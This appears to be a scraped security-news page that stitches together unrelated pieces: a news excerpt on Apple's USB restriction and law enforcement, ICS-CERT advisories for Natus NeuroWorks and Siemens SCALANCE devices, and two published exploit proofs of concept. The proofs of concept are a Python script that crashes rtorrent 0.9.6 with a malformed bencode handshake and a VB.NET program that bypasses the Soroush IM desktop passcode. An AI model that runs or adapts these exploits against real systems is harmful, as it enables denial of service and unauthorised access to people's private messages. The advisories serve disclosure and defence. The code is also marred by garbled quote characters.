Apple CEO Tim Cook at the time said in an open letter: “Building a version of iOS that bypasses security in this way would undeniably create a backdoor. And while the government may argue that its use would be limited to this case, there is no way to guarantee such control.”

When it comes to the new USB security measure, meanwhile, Apple said in a statement to Reuters that the move is directed toward hackers and bad actors instead of law enforcement.

“We have the greatest respect for law enforcement, and we don’t design our security improvements to frustrate their efforts to do their jobs,” the Apple spokesperson told Threatpost in an email.

Despite Apple’s assurances, the move may continue to sour the relationship between the phone giant and the government, experts say.

“This move shows that Apple is putting the consumer’s privacy first, at least in this instance,” Troy Kent, threat researcher at  Awake Security,  told Threatpost. “It’s better for the general consumer and also likely for organizations. Will it sour the relationship between Apple and the law enforcement in the future?  I’m sure.  But that doesn’t mean there won’t be another exploit out sometime soon that doesn’t require a USB connection.”

Erlin, for his part, said that law enforcement in the U.S. will certainly be impacted by this most recent move by Apple.

“This isn’t the first time that we’ve seen tension between Apple and law enforcement,” Erlin told Threatpost. “While Apple’s position is that addressing this vulnerability is for the benefit of customers in countries where there are fewer legal protections around seizing devices, there’s no doubt that it will impact law enforcement in the United States as well.”

Natus Xltek NeuroWorks

1. EXECUTIVE SUMMARY

  • CVSS v3 10.0

  • ATTENTION: Exploitable remotely/low skill level to exploit
  • Vendor: Natus Medical, Inc. (Natus)
  • Equipment: Natus Xltek NeuroWorks software
  • Vulnerabilities: Stack-Based Buffer Overflow, Out-of-Bounds Read

2. RISK EVALUATION

Successful exploitation of these vulnerabilities requires access to the Natus customer network, and could crash the device being accessed; a buffer overflow condition may allow remote code execution.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

The following version of Natus Xltek NeuroWorks, used in Natus Xltek EEG medical products, is affected:

  • Natus Xltek NeuroWorks Version 8

3.2 VULNERABILITY OVERVIEW

3.2.1    OUT-OF-BOUNDS READ CWE-125

A specially-crafted packet may be able to cause an out-of-bounds read, which may result in a denial-of-service condition.

CVE-2017-2852 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).

3.2.2    STACK-BASED BUFFER OVERFLOW CWE-121

An attacker may cause a buffer overflow by sending a specially-crafted packet to the affected product while the product attempts to open a file requested by the client.

CVE-2017-2853 has been assigned to this vulnerability. A CVSS v3 base score of 10.0 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).

3.2.3    OUT-OF-BOUNDS READ CWE-125

A specially-crafted packet may cause an out-of-bounds read, which may result in a denial-of-service condition.

CVE-2017-2858 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).

3.2.4    OUT-OF-BOUNDS READ CWE-125

A specially-crafted packet may cause an out-of-bounds read, which may result in a denial-of-service condition.

CVE-2017-2860 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).

3.2.5    OUT-OF-BOUNDS READ CWE-125

A specially-crafted packet may cause an out-of-bounds read, which may result in a denial-of-service condition.

CVE-2017-2861 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).

3.2.6    STACK-BASED BUFFER OVERFLOW CWE-121

A specially-crafted packet received during the execution of certain commands can cause memory to be overwritten in a way that could allow an attacker to take control of the program.

CVE-2017-2867 has been assigned to this vulnerability. A CVSS v3 base score of 9.0 has been calculated; the CVSS vector string is (AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H).

3.2.7    STACK-BASED BUFFER OVERFLOW CWE-121

An error in the way the program parses data structures may allow an attacker to take control of the system by sending it a specially-crafted packet.

CVE-2017-2868 has been assigned to this vulnerability. A CVSS v3 base score of 10.0 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).

3.2.8    STACK-BASED BUFFER OVERFLOW CWE-121

A specially-crafted packet takes advantage of the way the program parses data structures and may cause a buffer overflow, which may allow remote execution of arbitrary code.

CVE-2017-2869 has been assigned to this vulnerability. A CVSS v3 base score of 10.0 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).

3.3 BACKGROUND

  • CRITICAL INFRASTRUCTURE SECTORS: Healthcare and Public Health
  • COUNTRIES/AREAS DEPLOYED: Worldwide
  • COMPANY HEADQUARTERS LOCATION: Pleasanton, California

3.4 RESEARCHER

Cory Duplantis from Cisco Talos discovered these vulnerabilities and reported them to Natus.

4. MITIGATIONS

Natus has released NeuroWorks/SleepWorks 8.5 GMA 3, a software update with security enhancements to address the vulnerabilities identified in NeuroWorks/SleepWorks 8.

A free software update to NeuroWorks/SleepWorks 8.5 GMA 3 is available to users using NeuroWorks/SleepWorks Version 8.0, 8.1, 8.4, or 8.5. Contact the Natus Neuro Technical support department at 1-800 387-7516 or email [email protected] for more details.

Natus recommends installing this update as quickly as possible on affected systems.

NCCIC recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:

  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  • Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

NCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

NCCIC also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

Additional mitigation guidance and recommended practices are publicly available on the ICS-CERT website in the Technical Information Paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.

No known public exploits specifically target these vulnerabilities.

rtorrent 0.9.6 Denial Of Service

# Exploit Title: rtorrent 0.9.6 – Denial of Service
# Date: 2018-01-10
# Exploit Author: ecx86
# Vendor Homepage: http://rtorrent.net
# Software Link: https://github.com/rakshasa/rtorrent/releases
# Version: <= 0.9.6
# Tested on: Debian GNU/Linux 9.4 (stretch)

# This crash is due to a bad bencode parse of the handshake data map.
# Specifically, by providing a massive length for a string, namely the key of a map entry,
# malloc fails, returning 0, which is passed to a memcpy call that causes the segfault.
# This can be triggered actively by sending the crash-triggering data to a seeding rtorrent
# client, or when a downloading rtorrent client connects to a malicious peer.

#!/usr/bin/env python
# Proof-of-concept listing as published: builds one BitTorrent peer handshake
# followed by a single framed message whose bencode payload declares an
# implausibly large string length (see the header comment above on malloc/memcpy).
# Written for Python 2 string semantics: `str` values are concatenated directly
# with the output of struct.pack, which returns bytes on Python 3 and would raise.
# The quote characters in this listing were turned into typographic quotes by
# extraction, so it is not valid source as pasted.
import socket
import struct

crash = ”  # empty string accumulator for the handshake bytes (quotes garbled by extraction)
proto_name = ‘BitTorrent protocol’
crash += chr(len(proto_name)) + proto_name # pstrlen byte followed by the protocol identifier
crash += ‘00000000’ # 8 reserved bytes, sent here as ASCII zeros rather than NUL bytes

# 20-byte info_hash placeholder (all NUL bytes); the header comment notes it must
# match a torrent the target client actually has loaded
crash += ‘\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00’

crash += ‘00000000000000000000’ # 20-byte peer id, again ASCII zeros

msg = ”  # empty accumulator for the framed message that follows the handshake
# NOTE(review): packed little-endian ('<H') while the length prefix below is
# big-endian ('>I'); the original comment labels this as the "extended" message type.
msg += struct.pack(‘<H’, 20) # message type: extended
# The payload opens a bencode dictionary ('d') whose first key is declared with a
# length far larger than the message itself. Per the header comment this is what
# drives the allocation failure; from a detection standpoint, a bencode string
# length exceeding the enclosing framed-message length is the anomaly to look for.
msg += ‘d99999999999999999999999999999999:’ # payload

crash += struct.pack(‘>I’, len(msg))  # 4-byte big-endian length prefix for the message
crash += msg

# 1.3.3.7:6890 is a placeholder peer address/port; the client at that address is
# the process that parses the handshake. Note that send() is called once without
# checking how many bytes were actually written.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((‘1.3.3.7’, 6890))
s.send(crash)
s.close()

Siemens SCALANCE X Switches, RUGGEDCOM WiMAX, RFID 181-EIP, and SIMATIC RF182C

1. EXECUTIVE SUMMARY

  • CVSS v3 7.5

  • ATTENTION: Exploitable from the same local network segment (OSI Layer 2)
  • Vendor: Siemens
  • Equipment: SCALANCE X switches, RUGGEDCOM WiMAX, RFID 181-EIP, and SIMATIC RF182C
  • Vulnerability: Permissions, Privileges, and Access Controls

2. RISK EVALUATION

By sending a specially-crafted DHCP response to a client’s DHCP request, an unprivileged remote attacker could execute arbitrary code.

3. TECHNICAL DETAILS

3.1 AFFECTED PRODUCTS

Siemens reports the vulnerability affects the following products:

  • RFID 181-EIP: All versions,
  • RUGGEDCOM WiMAX: v4.4 and v4.5,
  • SCALANCE X-200: All versions prior to v5.2.3,
  • SCALANCE X-200 IRT: All versions prior to v5.4.1,
  • SCALANCE X-204RNA: All versions,
  • SCALANCE X-300: All versions,
  • SCALANCE X408: All versions,
  • SCALANCE X414: All versions, and
  • SIMATIC RF182C: All versions.

3.2 VULNERABILITY OVERVIEW

3.2.1    PERMISSIONS, PRIVILEGES, AND ACCESS CONTROLS CWE-264

Unprivileged remote attackers located in the same local network segment (OSI Layer 2) could gain remote code execution on the affected products by sending a specially-crafted DHCP response to a client’s DHCP request.

CVE-2018-4833 has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is (AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).

3.3 BACKGROUND

  • CRITICAL INFRASTRUCTURE SECTORS: Chemical, Energy, Food and Agriculture, Healthcare and Public Health, Transportation Systems, and Water and Wastewater Systems
  • COUNTRIES/AREAS DEPLOYED: Worldwide
  • COMPANY HEADQUARTERS LOCATION: Germany

3.4 RESEARCHER

Dr. Ang Cui and Joseph Pantoga from Red Balloon Security reported this vulnerability to Siemens Product CERT.

4. MITIGATIONS

Siemens has provided updates for the following products to fix the vulnerability:

  • SCALANCE X-200: Update to v5.2.3

https://support.industry.siemens.com/cs/cn/en/view/109758142

  • SCALANCE X-200 IRT: Update to v5.4.1

https://support.industry.siemens.com/cs/de/en/view/109758144

Siemens has identified the following specific workarounds and mitigations that customers can apply to reduce the risk:

As a general security measure, Siemens strongly recommends protecting network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends configuring the environment according to Siemens’ operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and following the recommendations in the product manuals.

Additional information on Industrial Security by Siemens can be found at:

https://www.siemens.com/industrialsecurity

For more information on this vulnerability and associated software updates, please see Siemens security advisory SSA-181018 on their website:

https://www.siemens.com/cert/advisories

NCCIC recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:

  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  • Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

NCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

NCCIC also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

Additional mitigation guidance and recommended practices are publicly available on the ICS-CERT website in the Technical Information Paper, ICS-TIP-12-146-01B–Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.

No known public exploits specifically target this vulnerability. High skill level is needed to exploit.

Soroush IM Desktop App 0.15 Authentication Bypass

# Exploit Title: Soroush IM Desktop app 0.15 – Authentication Bypass
# Date: 2018-06-13
# Exploit Author: VortexNeoX64
# Vendor Homepage: https://soroush-app.ir
# Software Link: https://soroush-app.ir/UploadedData/Soroush.exe
# Version: 0.15 BETA
# Tested on: Windows 10 1803

# Security Issue:
# Attackers can unlock the client app installed on Windows (other OSes not verified) without the passcode
# and access all the files, chats, images, etc.
# The attacker can then send and receive messages of any kind on behalf of the authorized user.

# PoC (.NET 4.0 Visual Basic)

”make sure before running this exploit the Soroush Messager window is NOT minimized
”adding InteropServices for DLLImport
Imports System.Runtime.InteropServices
Module Module1

' Proof-of-concept as published: resizes the running Soroush main window through
' user32 MoveWindow and then relies on the operator to close and reopen the window
' by hand. The only Win32 calls are the two P/Invoke declarations below.
”FindWindow API from user32.dll to get the window handle by lpWindowName
<DllImport(“user32.dll”, SetLastError:=True)>
Private Function FindWindow(lpClassName As String, lpWindowName As String) As IntPtr
End Function
”MoveWindow API from user32.dll to move and resize the window to trigger the bypass process
' NOTE(review): SetLastError:=True is set on both imports but Marshal.GetLastWin32Error
' is never read, so a failed call is silent.
<DllImport(“user32.dll”, SetLastError:=True)> Private Function MoveWindow(hWnd As IntPtr, X As Integer, Y As Integer,
nWidth As Integer, nHeight As Integer, bRepaint As Boolean) As Boolean
End Function
' Entry point: prints a banner, waits for a key, locates the process and window,
' resizes the window, then waits for the operator. All failures fall through to the
' Catch block, which beeps, shows the exception message and waits for a key.
Sub Main()
Try
Console.WriteLine(“<<<<<Soroush IM Desktop GUI misbehaviour leads to passcode bypass>>>>> “)
Console.WriteLine(“****** Developer: NeoVortex”)
Console.WriteLine(“****** Client Version 0.15 BETA”)
Console.WriteLine(“****** Tested on windows 10 1803”)
Console.WriteLine(“[****] Make sure the Messager windows is not minimized “)
Console.WriteLine(“[Press any key to start the exploit…]”)
Console.ReadKey()
' Process lookup by image name and window lookup by title are independent of
' each other; lpClassName is Nothing so only the window title "Soroush" is matched.
Dim pss() As Process = Process.GetProcessesByName(“Soroush”)
Dim hWnd As IntPtr = FindWindow(Nothing, “Soroush”)
” check if the app is running
' NOTE(review): only the process count is checked; hWnd is not compared with
' IntPtr.Zero, so a missing or differently titled window still reaches MoveWindow.
If (pss.Count > 0) Then
Console.WriteLine(“[****] Process found with id: ” & pss(0).Id)
Console.WriteLine(“[****] Process File ” & pss(0).MainModule.FileName)
Console.WriteLine(“[****] Resizing to trigger the vulnerability…..”)
” move and resize the window to a 100x100 rectangle at (100,100) with repaint; the return value is not checked
MoveWindow(hWnd, 100, 100, 100, 100, True)
Console.WriteLine(“[****] Done”)
Console.WriteLine(“[****] Now close the Soroush messager windows via X button (NOT via system tray) , then reopen it “)
Console.WriteLine(“[****] Passcode will be bypassed! “)
” now you should close the exploit window and then close the Soroush messager window manually via X button (NOT FROM SYSTEM TRAY) because the Soroush messager window does not support the WM_CLOSE signal for single-window closing
”if anyone could close the GUI window without actually killing the app, he/she is welcome at the GitHub link below.
Else
”app is not running
Console.WriteLine(“[—-]Process not found “)
End If
Console.ReadKey()

Catch ex As Exception
' Any exception (including a failed MainModule access) ends here with a beep and a message box.
Beep()
MsgBox(ex.Message, 16)
Console.ReadKey()
End Try
End Sub

End Module